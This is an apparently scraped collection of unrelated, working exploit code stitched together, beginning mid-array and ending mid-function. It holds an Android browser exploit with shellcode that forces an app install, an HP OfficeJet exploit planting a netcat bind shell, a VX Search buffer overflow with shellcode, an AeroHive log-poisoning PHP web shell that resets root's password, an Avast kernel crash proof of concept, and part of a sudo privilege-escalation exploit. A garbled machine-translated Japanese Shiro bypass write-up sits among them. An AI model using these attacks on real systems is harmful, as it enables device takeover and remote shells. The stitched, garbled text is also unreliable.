80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];
var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000";
var arrayBuffer = new ArrayBuffer(0x1000000);
var arrayBufferAddress = getObjAddr(arrayBuffer)-1;
var backingStoreAddress = read_uint32(arrayBufferAddress+4*4);
var args_address = backingStoreAddress+1024;
function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//array_buffer_address
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];
for(var i=0;i<stub.length;i++){
globaldv[buffer/4+i]=stub[i];
}
shellcode = shellcode.concat([0,0,0,0]);
for(var i=0;i<shellcode.length/4>>>0;i++){
// u8arr[i+4*stub.length]=shellcode[i];
globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);
}
return stub.length*4+shellcode.length;
}
function xss_code(){
//alert(navigator.userAgent);
//alert(document.cookie);
var i1=setInterval(function(){
if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){
console.log("wait load complete");
return;
}
clearInterval(i1);
var i2=setInterval(function(){
document.getElementsByClassName("price buy id-track-click")[0].click();
var installButton = document.getElementById("purchase-ok-button");
if(installButton == null)
return;
installButton.click();
document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>");
clearInterval(i2);
setTimeout(function(){
window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
},26000);
},500);
},500);
}
var js_str="\n"+xss_code.toString()+"xss_code();\n";
//var backup_arr = backup_original_code(huge_func_code_entry);
var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);
var args_view = new DataView(arrayBuffer,1024,100);
var so_file_view = new DataView(arrayBuffer,4096);
var js_view = new DataView(arrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+0xc,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,huge_func_code_entry,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,backingStoreAddress+4096,true);
args_view.setUint32(20,so_str.length/2,true);
args_view.setUint32(24,backingStoreAddress+0x100000,true);
args_view.setUint32(28,js_str.length,true);
print("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
for(var i=0;i<js_str.length;i++){
js_view.setUint8(i,js_str.charCodeAt(i));
}
print("begin execute shellcode");
huge_func({});
print("done");
postMessage(true);
//prevent arrayBuffer to be released
while(1){}
}
//main world
function print(){
console.log.apply(null,arguments);
document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");
}
// Build a worker from an anonymous function body
var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );
var worker;
var exploitSucc = false;
var count = 0;
function startExploit(){
print("worker thread is started");
worker = new Worker( blobURL );
count++;
worker.onmessage = function(e){
print("exploit result is "+e.data);
exploitSucc = e.data;
if(exploitSucc==false){
startExploit();
return;
}
var end = +new Date();
print("time diff is "+(end-begin)/1000);
//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';
}
}
var begin = +new Date();
startExploit();
var savedCount = 0;
var hangMonitor = setInterval(function (){
if(exploitSucc==true){
clearInterval(hangMonitor);
}else{
if(savedCount==count){//maybe hang
print("worker maybe hange");
worker.terminate();
startExploit();
}else{
print("worker is normal");
savedCount = count;
}
}
},10000);
//URL.revokeObjectURL( blobURL );
</script>
</html>
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##
import socket
import sys
from easysnmp import snmp_set
profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
'\tmkfifo /tmp/pwned\n'
'\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
'fi\n')
if len(sys.argv) != 3:
print '\nUsage:upload.py [ip] [port]\n'
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)
response = ''
while True:
data = sock1.recv(1)
if '\n' == data: break
response += data
print response
snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
print 'Done! Try port 1270 in ~30 seconds'
import os
import struct
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
# Date: 2017.06.15
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
overflow = "A" * 1536
jmp_esp = "\x4E\x21\x1F\x65"
#"\x94\x21\x1C\x65"
shortjump = "\xEB\x55"
shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
"\xae\xc2\x28\x4b\x32\x05")
crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()
print "Magic.xml raedy!"
#!/usr/bin/python3
# TARGET: AeroHive AP340 HiveOS < 6.1r5
# Confirmed working on AP340 HiveOS 6.1r2
# This program uses a local file inclusion vulnerability
# 1. Poison the log file in /var/log/messages by injecting PHP code into the
# username field of the login page
# 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
# 3. Login with SSH as root using password "password"
import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen
import urllib
# Payload to poison the log file at /var/log/messages
# Note if you mess up and get invalid syntax errors just reboot AP it
# will erase/rotate the logs
payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){ $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"</pre>$cmd<pre>\"; die; } ?>"
# URL of the login page where we will inject our PHP command exec code so it poisons the log file
post_url= "/login.php5?version=6.1r2"
post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
post_fields = urllib.parse.urlencode(post_fields)
data = post_fields.encode('ascii')
# Payload to call the injected PHP code
payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="
# Payload to change the root SSH user password
payload_command = "echo+root:password+|+/usr/sbin/chpasswd"
# Combined payload to change password using LFrI
payload_chpasswd = payload_lfi_url+payload_command
print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")
# Get target URL from user
print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
wap_ip = input(">>> ")
base_url = "http://" + wap_ip
# Poison log file with POST to login page
# json_data = json.dumps(post_fields).encode("utf8")
# request = urllib.request.Request(base_url+post_url, post_fields)
print ("Poisoning log file at /var/log/messages. . .")
request = urllib.request.Request(base_url+post_url, data)
json = urlopen(request).read().decode()
# Change the command with LFI->command execution
print("Interacting with PHP shell to change root password. . .")
content = urllib.request.urlopen(base_url+payload_chpasswd).read()
if "Password for " in content.decode('ascii'):
print("Success!")
print("Now try to log in with root:password via SSH!")
else:
print("Exploit Failed")
0x00脆弱性の説明
Apache Shiroは、認証、承認、パスワード、セッション管理を実行する強力で使いやすいJavaセキュリティフレームワークです。 Apache Shiro Authenticationバイパス脆弱性CVE-2020-11989の以前の修正パッチに欠陥がありました。 1.5.3以前には、ShiroがURLを処理する際にまだ春と違いがあるため、ID検証バイパスの脆弱性がまだあります。認証要求の処理がエラーにより、リモート攻撃者は、特別に作成されたHTTPリクエストを送信し、認証プロセスをバイパスし、アプリケーションへの不正アクセスを取得できます。
0x01脆弱性の影響
apache shiro 1.6.0
0x02環境構築
1。プロジェクトをローカルhttps://github.com/l3yx/springboot-shiro2にダウンロードします。 POM.xmlの1.5.2を1.5.3で置き換え、SRC/Main/Java/org/syclover/srpingbootshirologingincontrollerで/admin/pageで/admin/{name} 
3でバックグラウンド検証を交換します。 Idea Editorを再構築して実行します。コンパイルされた戦争パッケージをTomcatの下のWebAppsディレクトリに入れて実行します。 https://github.com/backlion/demo/blob/master/srpingboot-shiro-0.1-snapshot.war
0x03コード説明
1。 shiroconfig.java(pringboot-shiro-master \ src \ main \ java \ org \ syclover \ srpingbootshiro \ shiroconfig.java)許可設定。 /admin/*リソースを要求するとき、302はアイデンティティ認証のためにログインページにジャンプします名前の名前(アイデンティティ認証のトリガー)
0x04脆弱性の再発
1。リクエストルートでリソース名が指定されていない場合、認証はトリガーされず、リソースが返されません。
33http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/admin 
2。リクエストルートでリソース名を指定する場合、302は認証ページにジャンプします:http://192.168.1.933608080/srpingboot-shiro-0.0.1-snapshot/login 
3。特定のPOCリクエストを作成すると、指定されたリソースがリクエストされる場合、認証はトリガーされず、許可はバイパスされます(%3Bでバイパス)3http://192.168.1.1.9:80800/SRPINGBOOT-SHIRO-0.0.1-SNAPSHOT/ADMIN/
0x05脆弱性分析
問題はorg.apache.shiro.web.util.webutilsにあることがわかります。ここにブレークポイントを置いてからデバッグしてください。
が更新され、getServletpathとgetpathinfoを使用してURLを取得しました。ただし、実際の脆弱性ポイントはここにありません。
スプライシング後のURLが大丈夫であることがわかります。
のセミコロン処理を削除した後、 /admin /*のみが保持されていることがわかります。テスト用のコントローラーへのルートを追加/管理することができます@getMapping( '/admin*')
public string admin2(){
返品「ログインしてください、admin」;
} http://192.168.1.933608080/srpingboot-shiro-0.0.1-snapshot/admin/*
アクセスを確認する許可はありません。もちろん、後でパラメーターを追加すると、アクセス許可が必要です。
フォローアップremovesemicolon
同様に、コンテンツの後。を含む。
Springがそれをどのように処理するか見てみましょう
Springには問題がありません。
URLを処理する方法を見てみましょう
`org.springframework.web.util.urlpathhelper#decodeandcleanuristring 
removesememicoloncontent#remove;そして後の部分
decoderequestString#urldecodeデコード
getAnitizedPath#を置き換える//shiroは反対の
であるが、urldecodeが最初に実行され、それが削除され、脆弱性デバッグの場所:shiro-web-1.5.3.jar //org.apache.shiro.util.webutils.java
//行111
public static string getpathwithinapplication(httpservletrequestリクエスト){
return remormize(removesemicolon(getservletpath(request) + getpathinfo(request)));
} pring-web-5.2.5.Release.jar //org.springframework.web.util.urlpathhelper.java
//行459
private string decodeandcleanuristring(httpservletrequest request、string uri){
uri=removesemicoloncontent(uri);
uri=decoderequestString(request、uri);
uri=getSanitizedPath(uri);
uriを返します。
}
0x06脆弱性修正
現在、公式の脆弱性の修正バージョンがリリースされ、更新されたApache Shiro=1.6.0
0x07参照
https://github.com/lyy289065406/cve-2020-139333https://www.cnblogs.com/ph4nt0mer/p/135359999.htmlhttps://xz.aliyun.com/t/8223
/**
* Author: bee13oy
* BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)
* Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
*
* There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl
* number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the
* context of SYSTEM.
**/
#include <Windows.h>
void BSoD(const char* szDeviceName)
{
HANDLE hDevice = CreateFileA(szDeviceName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice != INVALID_HANDLE_VALUE)
{
DWORD nbBytes = 0;
CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a";
CHAR bufOuput[0x8+1] = "";
DeviceIoControl(hDevice,
0x82ac0170,
bufInput,
0x00000008,
bufOuput,
0x00000008,
&nbBytes,
NULL
);
}
}
int _tmain(int argc, _TCHAR* argv[])
{
BSoD("\\\\.\\aswSnx");
return 0;
}
/*
* E-DB Note: http://www.openwall.com/lists/oss-security/2017/05/30/16
* E-DB Note: http://seclists.org/oss-sec/2017/q2/470
*
* Linux_sudo_CVE-2017-1000367.c
* Copyright (C) 2017 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <paths.h>
#include <pty.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define SUDO_BINARY "/usr/bin/sudo"
#define TARGET_FILE "/etc/init.d/README"
#define SELINUX_ROLE "unconfined_r"
#define WORKING_DIR "/dev/shm/_tmp"
#define TTY_SYMLINK WORKING_DIR "/_tty"
#define TTY_SYMLINK_ TTY_SYMLINK "_"
#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
int
main(const int my_argc, const char * const my_argv[])
{
if (my_argc <= 1) die();
if (my_argc >= INT_MAX/2) die();
char comm[sizeof(WORKING_DIR) + 16];
char pts[PATH_MAX];
#define PTS_NUM 32
int pts_fds[2 * PTS_NUM];
unsigned int i = PTS_NUM;
while (i--) {
int ptm_fd;
if (openpty(&ptm_fd, &pts_fds[i], pts, NULL, NULL)) die();
if (close(ptm_fd)) die();
}
struct stat sbuf;
if (fstat(*pts_fds, &sbuf)) die();
if (!S_ISCHR(sbuf.st_mode)) die();
if (sbuf.st_rdev <= 0) die();
if ((unsigned int)snprintf(comm, sizeof(comm), "%s/ %lu ", WORKING_DIR, (unsigned long)sbuf.st_rdev)
>= sizeof(comm)) die();
for (i = 0; i < PTS_NUM; i++) {
if (close(pts_fds[i])) die();
}
if (mkdir(WORKING_DIR, 0700)) die();
if (symlink(pts, TTY_SYMLINK)) die();
if (symlink(TARGET_FILE, TTY_SYMLINK_)) die();
if (symlink(SUDO_BINARY, comm)) die();
const int inotify_fd = inotify_init1(IN_CLOEXEC);
if (inotify_fd <= -1) die();
const int working_wd = inotify_add_watch(inotify_fd, WORKING_DIR, IN_OPEN | IN_CLOSE_NOWRITE);
if (working_wd <= -1) die();
const int cpu = sched_getcpu();
if (cpu >= CPU_SETSIZE) die();
if (cpu < 0) die();
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) die();
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
const unsigned int argc = 3 + my_argc - 1;
char ** const argv = calloc(argc + 1, sizeof(char *));
if (!argv) die();
argv[0] = comm;
argv[1] = "-r";
argv[2] = SELINUX_ROLE;
memcpy(&argv[3], &my_argv[1], my_argc * sizeof(char *));
if (argv[argc]) die();
if (setpriority(PRIO_PROCESS, 0, +19) != 0) die();
static const struct sched_param sched_param = { .sched_priority = 0 };
(void) sched_setscheduler(0, SCHED_IDLE, &sched_param);
execve(*argv, argv, NULL);
die();
}
struct inotify_event event;
if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
if (kill(pid, SIGSTOP)) die();
if (event.wd != working_wd) die();
if (event.mask != (IN_OPEN | IN_ISDIR)) die();
for (i = 0; ; i++) {
if (i >= sizeof(pts_fds) / sizeof(*pts_fds)) die();
int ptm_fd;
char tmp[PATH_MAX];
if (openpty(&ptm_fd, &pts_fds[i], tmp, NULL, NULL)) die();
if (!strcmp(tmp, pts)) break;
if (close(ptm_fd)) die();
}
while (i--) {
if (close(pts_fds[i])) die();
}
if (kill(pid, SIGCONT)) die();
if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
if (kill(pid, SIGSTOP)) die();
if (event.wd != working_wd) die();
if (event.mask != (IN_CLOSE_NOWRITE | IN_ISDIR)) die();
